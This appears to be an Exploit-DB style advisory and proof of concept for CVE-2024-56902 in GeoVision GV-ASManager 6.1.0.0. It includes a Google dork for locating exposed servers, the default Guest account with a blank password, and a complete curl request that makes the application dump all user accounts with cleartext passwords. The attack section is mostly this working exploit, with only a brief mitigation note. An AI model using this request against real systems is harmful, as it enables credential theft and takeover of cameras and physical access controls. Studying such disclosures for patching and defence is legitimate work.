Information Disclosure in GeoVision GV-ASManager

vendor:

GV-ASManager

by:

Giorgi Dograshvili [DRAGOWN]

6.1

CVSS

HIGH

Information Disclosure

200

CWE

Product Name: GV-ASManager

Affected Version From: 6.1.0.0

Affected Version To: 6.1.0.0

Patch Exists: NO

Related CWE: CVE-2024-56902

CPE: a:geovision:gv-asmanager:6.1.0.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10, Kali Linux

2025

Information Disclosure in GeoVision GV-ASManager

An information disclosure vulnerability has been found in the GeoVision GV-ASManager web application with version 6.1.0.0 or lower. This vulnerability allows unauthorized access to sensitive information within the application, such as user accounts and clear text passwords, potentially leading to unauthorized access to monitoring cameras, access cards, and other critical data.

Mitigation:

To mitigate this vulnerability, it is recommended to update GeoVision GV-ASManager to a version higher than 6.1.0.0. Additionally, restrict network access to the application and disable the Guest account or any low privilege accounts if not needed.

Source

Exploit-DB raw data:

# Exploit Title: Information Disclosure in GeoVision GV-ASManager
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.0.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56902
# PoC: https://github.com/DRAGOWN/CVE-2024-56902


Information disclosure vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.

Requirements
To perform successful attack an attacker requires:
- GeoVision ASManager version 6.1.0.0 or less
- Network access to the GV-ASManager web application (there are cases when there are public access)
- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>)

Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A low privilege account is able to:
- Enumerate user accounts
- Retrieve cleartext password of any account in GV-ASManager.
After reusing the retrieved password, an attacker will be able to:
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Reusing retrieved password in other digital assets of the organization.

cURL script:

curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: */*' -H $'Origin: https://192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \
   -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
    --data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \
    $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'


After a successful attack, you will get access to:
- ASWeb	- Access & Security Management 
- TAWeb	- Time and Attendance Management 
- VMWeb	- Visitor Management 
- ASManager - Access & Security Management software in OS